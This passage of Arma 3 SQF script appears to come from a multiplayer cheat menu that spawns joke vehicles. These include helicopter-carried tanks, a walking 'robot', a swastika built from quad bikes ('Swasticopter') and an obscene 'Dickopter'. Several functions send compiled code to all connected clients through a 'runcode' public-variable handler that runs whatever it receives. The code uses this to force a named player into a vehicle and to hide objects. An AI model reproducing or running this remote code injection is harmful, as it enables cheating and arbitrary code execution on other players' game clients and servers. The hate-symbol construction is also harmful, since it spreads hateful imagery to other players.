  2455. deleteVehicle vehicle _x;
  2456. deleteVehicle _x;
  2457. };
  2458. } forEach vehicles;
  2461. {
  2462. deleteVehicle vehicle _x;
  2463. deleteVehicle _x;
  2464. } forEach allDEAD;
  2467. hint format ["Deleted empty Vehicles"];
  2468. };
  2469. GEF_HeliBoat = {
  2470. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2471. if(isNil "LY_HeliBoatINited") then {
  2473. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2474. LY_SpawnHeliBoat = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2475. _obj = _this;
  2476. _name = name _obj;
  2477. _pos = _obj modelToWorld [0,10,0];
  2478. _pos2D = [_pos select 0,_pos select 1];
  2479. _Z = getTerrainHeightASL _pos2D;
  2480. _pos set[2,_Z+2];
  2481. _Tank = "C_Boat_Civil_04_F" createVehicle [0,0,100];
  2482. _Heli = "B_Heli_Light_01_F" createVehicle [0,0,150];
  2483. _Tank setMass 0;
  2484. _Tank attachTo [_Heli,[0,0,0]];
  2485. _Heli setPosASL _pos;
  2486. LY_HELI = _Heli;
  2487. publicVariable "LY_HELI";
  2488. runcode = compile format[" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  2489. waitUntil{!isNil 'LY_HELI'};
  2490. if(name player == '%1') then {
  2491. player moveInDriver LY_HELI;
  2492. };
  2493. LY_HELI hideObject true;
  2494. LY_HELI = nil;
  2495. ",_name];
  2496. publicvariable "runcode";
  2497. };
  2498. };
  2499. _client = { "runcode" addPublicVariableEventhandler {[] spawn (_this select 1);};};
  2500. [_client,true] call GEF_Rmote;
  2501. [_code,false] call GEF_Rmote;
  2502. LY_HeliBoatInited = true;
  2503. };
  2504. hint "Spawning HeliTank!";
  2505. _code = (" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};_player = objnull; {if(name _x == '"+(name player)+"') then {_player = _x;};} forEach playableUnits; _player spawn LY_SpawnHeliBoat;");
  2506. [_code,false] call GEF_Rmote;
  2507. };
  2508. GEF_HeliTank = {
  2509. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2510. if(isnil "LY_HeliTankInited") then {
  2511. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2512. _code = {
  2513. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2514. LY_SpawnHeliTank = {
  2515. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2516. _obj = _this;
  2517. _name = name _obj;
  2518. _pos = _obj modelToWorld [0,10,0];
  2519. _pos2D = [_pos select 0,_pos select 1];
  2520. _Z = getTerrainHeightASL _pos2D;
  2521. _pos set[2,_Z+2];
  2522. _Tank = "B_MBT_01_cannon_F" createVehicle [0,0,100];
  2523. _Heli = "B_Heli_Light_01_F" createVehicle [0,0,150];
  2524. _Tank setMass 0;
  2525. _Tank attachTo [_Heli,[0,0,0]];
  2526. _Heli setPosASL _pos;
  2527. LY_HELI = _Heli;
  2528. publicVariable "LY_HELI";
  2529. runcode = compile format[" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  2530. waitUntil{!isNil 'LY_HELI'};
  2531. if(name player == '%1') then {
  2532. player moveInDriver LY_HELI;
  2533. };
  2534. LY_HELI hideObject true;
  2535. LY_HELI = nil;
  2536. ",_name];
  2537. publicvariable "runcode";
  2538. };
  2539. };
  2540. _client = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName}; "runcode" addPublicVariableEventhandler {[] spawn (_this select 1);};};
  2541. [_client,true] call GEF_Rmote;
  2542. [_code,false] call GEF_Rmote;
  2543. };
  2544. hint "Spawning HeliTank!";
  2545. _code = ("_player = objnull; {if(name _x == '"+(name player)+"') then {_player = _x;};} forEach playableUnits; _player spawn LY_SpawnHeliTank;");
  2546. [_code,false] call GEF_Rmote;
  2547. };
  2548. GEF_Robot = {
  2549. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2550. closeDialog 0;
  2552. _pos = getPos Player;
  2553. _dir = getdir vehicle player;
  2554. _pos = [(_pos select 0)+8*sin(_dir),(_pos select 1)+8*cos(_dir),(_pos select 2)+5];
  2555. _pos2 = [_pos select 0,(_pos select 1)+ 30, (_pos select 2)];
  2556. _pos3 = [_pos select 0,(_pos select 1)+ 60, (_pos select 2)];
  2557. _pos4 = [_pos select 0,(_pos select 1)+ 90, (_pos select 2)];
  2558. _pos5 = [_pos select 0,(_pos select 1)+ 120,(_pos select 2)];
  2559. _pos6 = [_pos select 0,(_pos select 1)+ 150, (_pos select 2)];
  2560. _pos7 = [_pos select 0,(_pos select 1)+ 180, (_pos select 2)];
  2561. _pos8 = [_pos select 0,(_pos select 1)+ 210, (_pos select 2)];
  2562. _pos9 = [_pos select 0,(_pos select 1)+ 240, (_pos select 2)];
  2564. _myBike = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];
  2565. _myBike setDir _dir;
  2566. player action ['getindriver',_myBike];
  2567. _body_front= createVehicle ['Land_TentHangar_V1_F', _pos3, [], 0, 'CAN_COLLIDE'];
  2568. _body_back= createVehicle ['Land_TentHangar_V1_F', _pos4, [], 0, 'CAN_COLLIDE'];
  2570. _body_side_l= createVehicle ['Land_TentHangar_V1_F', _pos5, [], 0, 'CAN_COLLIDE'];
  2571. _body_side_r= createVehicle ['Land_TentHangar_V1_F', _pos6, [], 0, 'CAN_COLLIDE'];
  2572. _head= createVehicle ['Land_Radar_F', _pos7, [], 0, 'CAN_COLLIDE'];
  2573. _sandbag = createVehicle ['C_Quadbike_01_F',_pos2,[],0,'CAN_COLLIDE'];
  2574. _p_r = createVehicle ['C_Quadbike_01_F',_pos8,[],0,'CAN_COLLIDE'];
  2575. _p_l = createVehicle ['C_Quadbike_01_F',_pos9,[],0,'CAN_COLLIDE'];
  2576. _leg_l = createVehicle ['Land_Lighthouse_F',_pos3,[],0,'CAN_COLLIDE'];
  2577. _leg_r = createVehicle ['Land_Lighthouse_F',_pos3,[],0,'CAN_COLLIDE'];
  2579. _body_front attachTo [_sandbag,[12,0,0]];
  2580. [_body_front,-90,90] call bis_fnc_setPitchBank;
  2581. _body_back attachTo [_sandbag,[-12,0,0]];
  2582. [_body_back,-90,-90] call bis_fnc_setPitchBank;
  2583. _body_side_l attachTo [_sandbag,[0,12,0]];
  2584. [_body_side_l,-90,0] call bis_fnc_setPitchBank;
  2585. _body_side_r attachTo [_sandbag,[0,-12,0]];
  2586. [_body_side_r,-90,180] call bis_fnc_setPitchBank;
  2587. _body_bottom = createVehicle ['Land_TentHangar_V1_F', _pos4, [], 0, 'CAN_COLLIDE'];
  2588. _body_bottom attachTo [_sandbag,[0,0,-10]];
  2589. [_body_bottom,0,180] call bis_fnc_setPitchBank;
  2590. _body_bottom2 = createVehicle ['Land_TentHangar_V1_F', _pos4, [], 0, 'CAN_COLLIDE'];
  2591. _body_bottom2 setDir (getDir _body_bottom)+90;
  2592. _body_bottom2 attachTo [_sandbag,[0,0,-10]];
  2593. _body_bottom2 setDir (getDir _body_bottom)+90;
  2594. [_body_bottom2,0,180] call bis_fnc_setPitchBank;
  2595. _head attachTo [_sandbag,[0,0,15]];
  2596. _sandbag attachTo [_myBike,[0,0,40]];
  2597. _p_l attachTo [_sandbag,[15,-5,5]];
  2598. _p_r attachTo [_sandbag,[-15,-5,5]];
  2599. _leg_l attachTo [ _p_l,[0,0,-10]];
  2600. _leg_r attachTo [ _p_r,[0,0,-10]];
  2602. _leg_l2 = createVehicle ['Land_Lighthouse_F',_pos3,[],0,'CAN_COLLIDE'];
  2603. _leg_r2 = createVehicle ['Land_Lighthouse_F',_pos3,[],0,'CAN_COLLIDE'];
  2605. _leg_l2 attachTo [ _leg_l,[0,0,-10]];
  2606. _leg_r2 attachTo [ _leg_r,[0,0,-10]];
  2607. [_sandbag,_p_l,_myBike] spawn {
  2608. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2609. _sandbag = _this select 0;
  2610. _p_l = _this select 1;
  2611. _myBike = _this select 2;
  2612. while{true} do {
  2613. _speed = _myBike call bis_Fnc_absSpeed;
  2614. if(floor(_speed) != 0) then {
  2615. for "_i" from 1 to 10 do {
  2616. detach _p_l;
  2617. _p_l attachTo [_sandbag,[15,-5+_i,5]];
  2618. sleep 0.001;
  2619. };
  2620. for "_i" from 1 to 10 do {
  2621. detach _p_l;
  2622. _p_l attachTo [_sandbag,[15,5,5+(_i*-1)]];
  2623. sleep 0.001;
  2624. };
  2625. for "_i" from 1 to 10 do {
  2626. detach _p_l;
  2627. _p_l attachTo [_sandbag,[15,5+(_i*-1),-5]];
  2628. sleep 0.001;
  2629. };
  2630. for "_i" from 1 to 10 do {
  2631. detach _p_l;
  2632. _p_l attachTo [_sandbag,[15,-5,-5+_i]];
  2633. sleep 0.001;
  2634. };
  2635. };
  2636. };
  2637. };
  2638. [_sandbag,_p_r,_myBike] spawn {
  2639. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2640. _sandbag = _this select 0;
  2641. _p_r = _this select 1;
  2642. _myBike = _this select 2;
  2643. while{true} do {
  2644. _speed = _myBike call bis_Fnc_absSpeed;
  2645. if(floor(_speed) != 0) then {
  2646. for "_i" from 1 to 20 do {
  2647. sleep 0.001;
  2648. };
  2649. while{true} do {
  2650. _speed = _myBike call bis_Fnc_absSpeed;
  2651. if(floor(_speed) == 0) exitWith {};
  2652. for "_i" from 1 to 10 do {
  2653. detach _p_r;
  2654. _p_r attachTo [_sandbag,[-15,-5+_i,5]];
  2655. sleep 0.001;
  2656. };
  2657. for "_i" from 1 to 10 do {
  2658. detach _p_r;
  2659. _p_r attachTo [_sandbag,[-15,5,5+(_i*-1)]];
  2660. sleep 0.001;
  2661. };
  2662. for "_i" from 1 to 10 do {
  2663. detach _p_r;
  2664. _p_r attachTo [_sandbag,[-15,5+(_i*-1),-5]];
  2665. sleep 0.001;
  2666. };
  2667. for "_i" from 1 to 10 do {
  2668. detach _p_r;
  2669. _p_r attachTo [_sandbag,[-15,-5,-5+_i]];
  2670. sleep 0.001;
  2671. };
  2672. };
  2673. };
  2674. };
  2675. };
  2676. };
  2677. GEF_Swasticopter = {
  2678. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2679. closeDialog 0;
  2680. _pos = getPos Player;
  2681. _dir = getdir vehicle player;
  2682. _pos = [(_pos select 0)+8*sin(_dir),(_pos select 1)+8*cos(_dir),5];
  2683. _origX= _pos select 0;
  2684. _origY= _pos select 1;
  2685. _origZ= _pos select 2;
  2686. _moveX = 0;
  2687. _moveZ = 0;
  2688. _movepos = _pos select 0;
  2690. _origPos = _pos;
  2691. _origObject = createVehicle ['B_Heli_Light_01_F', _pos, [], 0, 'CAN_COLLIDE'];
  2693. ABC = {
  2695. _movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2696. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2697. _moveX = _moveX + 1;
  2698. _object1 attachTo [_origObject,[_moveX,0,0]];
  2700. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2701. _moveX = _moveX + 1;
  2702. _object1 attachTo [_origObject,[_moveX,0,0]];
  2704. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2705. _moveX = _moveX + 1;
  2706. _object1 attachTo [_origObject,[_moveX,0,0]];
  2708. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2709. _moveX = _moveX + 1;
  2710. _object1 attachTo [_origObject,[_moveX,0,0]];
  2712. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2713. _moveX = _moveX + 1;
  2714. _object1 attachTo [_origObject,[_moveX,0,0]];
  2715. };
  2716. ABC2 = {
  2717. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2718. _moveZ = _moveZ + 0;
  2719. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2721. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2722. _moveZ = _moveZ + 1;
  2723. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2725. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2726. _moveZ = _moveZ + 1;
  2727. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2729. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2730. _moveZ = _moveZ + 1;
  2731. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2733. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2734. _moveZ = _moveZ + 1;
  2735. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2737. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2738. _moveZ = _moveZ + 1;
  2739. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2741. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2742. _moveZ = _moveZ + 1;
  2743. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2745. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2746. _moveZ = _moveZ + 1;
  2747. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2749. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2750. _moveZ = _moveZ + 1;
  2751. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2753. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2754. _moveZ = _moveZ + 1;
  2755. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2757. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2758. _moveZ = _moveZ + 1;
  2759. _object1 attachTo [_origObject,[0,0,_moveZ]];
  2760. };
  2761. ABC3 = {
  2762. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2763. _object1 attachTo [_origObject,[_moveX,0,5]];
  2765. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2766. _moveX = _moveX - 1;
  2767. _object1 attachTo [_origObject,[_moveX,0,5]];
  2769. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2770. _moveX = _moveX - 1;
  2771. _object1 attachTo [_origObject,[_moveX,0,5]];
  2773. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2774. _moveX = _moveX - 1;
  2775. _object1 attachTo [_origObject,[_moveX,0,5]];
  2777. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2778. _moveX = _moveX - 1;
  2779. _object1 attachTo [_origObject,[_moveX,0,5]];
  2781. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2782. _moveX = _moveX - 1;
  2783. _object1 attachTo [_origObject,[_moveX,0,5]];
  2785. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2786. _moveX = _moveX - 1;
  2787. _object1 attachTo [_origObject,[_moveX,0,5]];
  2789. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2790. _moveX = _moveX - 1;
  2791. _object1 attachTo [_origObject,[_moveX,0,5]];
  2793. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2794. _moveX = _moveX - 1;
  2795. _object1 attachTo [_origObject,[_moveX,0,5]];
  2797. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2798. _moveX = _moveX - 1;
  2799. _object1 attachTo [_origObject,[_moveX,0,5]];
  2800. };
  2801. ABC4 = {
  2802. _moveX = 0;
  2803. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2804. _moveX = _moveX - 1;
  2805. _object1 attachTo [_origObject,[_moveX,0,10]];
  2807. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2808. _moveX = _moveX - 1;
  2809. _object1 attachTo [_origObject,[_moveX,0,10]];
  2811. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2812. _moveX = _moveX - 1;
  2813. _object1 attachTo [_origObject,[_moveX,0,10]];
  2815. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2816. _moveX = _moveX - 1;
  2817. _object1 attachTo [_origObject,[_moveX,0,10]];
  2819. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2820. _moveX = _moveX - 1;
  2821. _object1 attachTo [_origObject,[_moveX,0,10]];
  2822. };
  2823. ABC5 = {
  2824. _moveZ = -1;
  2825. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2826. _moveZ = _moveZ + 1;
  2827. _object1 attachTo [_origObject,[-5,0,_moveZ]];
  2829. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2830. _moveZ = _moveZ + 1;
  2831. _object1 attachTo [_origObject,[-5,0,_moveZ]];
  2833. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2834. _moveZ = _moveZ + 1;
  2835. _object1 attachTo [_origObject,[-5,0,_moveZ]];
  2837. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2838. _moveZ = _moveZ + 1;
  2839. _object1 attachTo [_origObject,[-5,0,_moveZ]];
  2841. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2842. _moveZ = _moveZ + 1;
  2843. _object1 attachTo [_origObject,[-5,0,_moveZ]];
  2845. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2846. _moveZ = _moveZ + 1;
  2847. _object1 attachTo [_origObject,[-5,0,_moveZ]];
  2848. };
  2849. ABC6 = {
  2850. _moveZ = 5;
  2851. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2852. _moveZ = _moveZ + 1;
  2853. _object1 attachTo [_origObject,[5,0,_moveZ]];
  2855. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2856. _moveZ = _moveZ + 1;
  2857. _object1 attachTo [_origObject,[5,0,_moveZ]];
  2859. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2860. _moveZ = _moveZ + 1;
  2861. _object1 attachTo [_origObject,[5,0,_moveZ]];
  2863. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2864. _moveZ = _moveZ + 1;
  2865. _object1 attachTo [_origObject,[5,0,_moveZ]];
  2867. _object1 = createVehicle ['C_Quadbike_01_F', _pos, [], 0, 'CAN_COLLIDE'];_movepos = _movepos + 3;_pos = [_movepos,_pos select 1,_pos select 2];
  2868. _moveZ = _moveZ + 1;
  2869. _object1 attachTo [_origObject,[5,0,_moveZ]];
  2871. };
  2872. Call ABC;
  2873. Call ABC2;
  2874. Call ABC3;
  2875. Call ABC4;
  2876. Call ABC5;
  2877. Call ABC6;
  2879. player action ['getInDriver',_origObject];
  2880. _code = {
  2881. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2882. LY_InvisTarget = {
  2883. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2884. _object = _this select 0;
  2885. _hide = _this select 1;
  2886. _object hideObject _hide;
  2887. };
  2888. };
  2889. [_code,true] call GEF_Rmote;
  2890. [format[" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};[objectfromnetid '%1',true] spawn LY_InvisTarget;",netid _origObject],true] call GEF_Rmote;
  2891. //[[_origObject,true],"LY_InvisTarget",true,false] call mp_runFunc;
  2892. };
  2893. GEF_Dickopter = {
  2894. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2895. closeDialog 0;
  2896. _pos = getPos Player;
  2897. _dir = getdir vehicle player;
  2898. _pos = [(_pos select 0)+8*sin(_dir),(_pos select 1)+8*cos(_dir),5];
  2899. _pos2 = [0,0,0];
  2902. _origObject = createVehicle ['B_Heli_Light_01_F', _pos, [], 0, 'CAN_COLLIDE'];
  2904. ABC = {
  2907. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2908. _object1 attachTo [_origObject,[4,0,2]];
  2910. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2911. _object1 attachTo [_origObject,[1,0,2]];
  2913. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2914. _object1 attachTo [_origObject,[4,0,1]];
  2916. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2917. _object1 attachTo [_origObject,[1,0,1]];
  2919. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2920. _object1 attachTo [_origObject,[-4,0,2]];
  2922. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2923. _object1 attachTo [_origObject,[-1,0,2]];
  2925. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2926. _object1 attachTo [_origObject,[-4,0,1]];
  2928. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2929. _object1 attachTo [_origObject,[-1,0,1]];
  2931. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2932. _object1 attachTo [_origObject,[-2,0,1]];
  2934. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2935. _object1 attachTo [_origObject,[2,0,1]];
  2937. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2938. _object1 attachTo [_origObject,[-2,0,2]];
  2940. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2941. _object1 attachTo [_origObject,[2,0,2]];
  2943. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2944. _object1 attachTo [_origObject,[-3,0,2]];
  2946. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2947. _object1 attachTo [_origObject,[3,0,2]];
  2949. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2950. _object1 attachTo [_origObject,[-3,0,1]];
  2952. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2953. _object1 attachTo [_origObject,[3,0,2]];
  2954. };
  2955. ABC2 = {
  2956. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2957. _object1 attachTo [_origObject,[4,-1,2]];
  2959. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2960. _object1 attachTo [_origObject,[1,-1,2]];
  2962. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2963. _object1 attachTo [_origObject,[4,-1,1]];
  2965. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2966. _object1 attachTo [_origObject,[1,-1,1]];
  2968. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2969. _object1 attachTo [_origObject,[-4,-1,2]];
  2971. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2972. _object1 attachTo [_origObject,[-1,-1,2]];
  2974. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2975. _object1 attachTo [_origObject,[-4,-1,1]];
  2977. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2978. _object1 attachTo [_origObject,[-1,-1,1]];
  2980. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2981. _object1 attachTo [_origObject,[-2,-1,1]];
  2983. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2984. _object1 attachTo [_origObject,[2,-1,1]];
  2986. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2987. _object1 attachTo [_origObject,[-2,-1,2]];
  2989. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2990. _object1 attachTo [_origObject,[2,-1,2]];
  2992. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2993. _object1 attachTo [_origObject,[-3,-1,2]];
  2995. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2996. _object1 attachTo [_origObject,[3,-1,2]];
  2998. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  2999. _object1 attachTo [_origObject,[-3,-1,1]];
